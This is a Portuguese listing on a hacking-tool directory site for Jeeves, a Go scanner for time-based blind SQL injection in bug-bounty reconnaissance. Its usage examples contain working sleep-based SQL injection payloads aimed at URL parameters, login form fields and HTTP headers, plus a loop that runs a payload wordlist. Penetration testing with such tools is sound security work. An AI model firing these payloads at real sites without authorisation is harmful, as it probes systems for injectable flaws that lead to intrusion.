Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Jeeves — Ferramenta de detecção de injeção SQL cega baseada em tempo para reconhecimento e bug bounty. Aceita URLs únicas ou listas, suporta cabeçalhos personalizados, proxy e dados POST para varredura automatizada de vulnerabilidades. | Kitploit
Ferramentas/GitHubGitHub/ferreiraklet/jeeves
Scanners de VulnerabilidadesSegurança WebTestes de Penetração
GitHubferreiraklet/jeeves

Jeeves

Ferramenta de detecção de injeção SQL cega baseada em tempo para reconhecimento e bug bounty. Aceita URLs únicas ou listas, suporta cabeçalhos personalizados, proxy e dados POST para varredura automatizada de vulnerabilidades.

Ver Repositório
2155044há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

made-with-Go

Jeeves


Uso • Instalação

Jeeves foi criado para buscar Injeção SQL Cega Baseada em Tempo durante o reconhecimento.

Conteúdo:

  • Instalação
  • Uso
    • Adicionando Cabeçalhos
    • Usando Proxy
    • Fazendo Requisição POST
    • Múltiplas formas de uso

- Instalação & Requisitos:

Instalando o Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

OU

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Uso & Explicação:

No seu processo de reconhecimento, você pode encontrar endpoints que podem ser vulneráveis a injeção SQL, Ex: https://redacted.com/index.php?id=1

URLs individuais

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

Em --payload-time você deve usar o tempo mencionado no payload


A partir de lista

cat targets | jeeves --payload-time 5

Adicionando Cabeçalhos

Preste atenção na sintaxe! Deve ser igual =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Usando proxy

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Cabeçalhos =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Requisição POST

Enviando dados via requisição POST ( formulários de login, etc )

Preste atenção na sintaxe! Deve ser igual! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Outras formas de uso

Você pode usar o Jeeves com outras ferramentas, como gau, gauplus, waybackurls, qsreplace e bhedak, dominando sua força


Flags da linha de comando:

root@kitploit:~
 Usage:
 -t, --payload-time,  The time from payload
 -p, --proxy          Send traffic to a proxy
 -c                   Set Concurrency, Default 25
 -H, --headers        Custom Headers
 -d, --data           Sending Post request with data
 -h                   Show This Help Message

Usando com wordlist de payloads SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testando em cabeçalhos

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • Não segue redirecionamentos. Se o Código de Status for diferente de 200, retorna "Need Manual Analisys"
  • Jeeves não faz verificação HTTP, ele não consegue fazer requisições para URLs que não contenham protocolo ( http://, https:// )

Este projeto é apenas para fins educacionais e de bug bounty! Não apoio nenhuma atividade ilegal!.

Se houver algum erro no programa, fale comigo imediatamente.

Por favor, verifique também estes =>

Nilo - Verifica se a URL tem status 200

SQLMAP

Blisqy Injeção SQL baseada em tempo em cabeçalhos

Baixar ferramenta